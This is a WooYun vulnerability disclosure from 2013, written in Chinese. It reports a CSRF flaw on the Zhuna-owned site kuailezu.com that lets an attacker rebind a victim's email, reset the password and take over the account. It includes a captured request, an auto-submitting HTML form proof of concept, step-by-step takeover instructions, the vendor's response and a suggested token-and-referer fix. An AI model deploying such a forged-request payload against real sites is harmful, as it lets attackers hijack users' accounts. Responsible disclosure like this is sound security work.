当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023770

漏洞标题:猥琐流再次重置住哪网任意用户密码甚至霸占用户帐号

相关厂商:住哪网

漏洞作者: 带馅儿馒头

提交时间:2013-05-15 12:30

修复时间:2013-05-15 12:57

公开时间:2013-05-15 12:57

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-15: 细节已通知厂商并且等待厂商处理中
2013-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

药,切克闹!求礼物!!!

详细说明:

问题出在住哪旗下的快乐租网站,客官往下看:
1.注册一个用户并登录,发现可更改用户邮箱;

1.jpg


2.点击更改邮箱,这里未进行任何校验、甚至无操作验证码;

2.jpg


3.填入我们需要重置的邮箱提交并抓包,得到如下数据;

POST /user.php?m=member.setMemberEmail HTTP/1.1
Host: www.kuailezu.com
Proxy-Connection: keep-alive
Content-Length: 24
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.kuailezu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.kuailezu.com/user.php?m=member.info
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie:... 
email=2xxxxxxx%40qq.com


4.测试发现这里未校验referer,so,我们制作了以下POC;

<html>
<body>
<form id="mantou" name="mantou" action="http://www.kuailezu.com/user.php?m=member.setMemberEmail" method="POST">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="submit" />
</form>
<script>
   document.mantou.submit();
</script>
</body>
</html>


5.运行POC的效果如下图;

10.jpg


6.运行POC之后,我们登录邮箱看到如下邮件;

3.jpg


7.点击邮件里的链接即可完成新邮箱的验证;

4.jpg


8.接下来,我们就可以直接使用该邮箱进行用户密码重置;

5.jpg


9.哈哈,邮箱收到密码重置链接咯;

6.jpg


10.重置密码完成后,可直接登录到住哪旗下任意网站;

8.jpg


11.各位客官可看到有个“更改手机号码”的功能,前面我们已经修改了用户的邮箱,如果能够再次修改用户的手机号码,岂不是直接霸占了用户的帐号,太邪恶了;

11.jpg


12.果然这里没有任何原始校验,我们直接填入手机号码,获取验证码,提交,搞定!!!

12.jpg


PS:写了这么多,求礼物呀!!!

漏洞证明:

见详细说明

修复方案:

敏感操作严格校验referer,
加入原始验证;

版权声明:转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-05-15 12:57

厂商回复:

这个漏洞是不成立

最新状态:

2013-05-15:感谢反馈,这里修改使用token+referer验证来防御CSRF漏洞。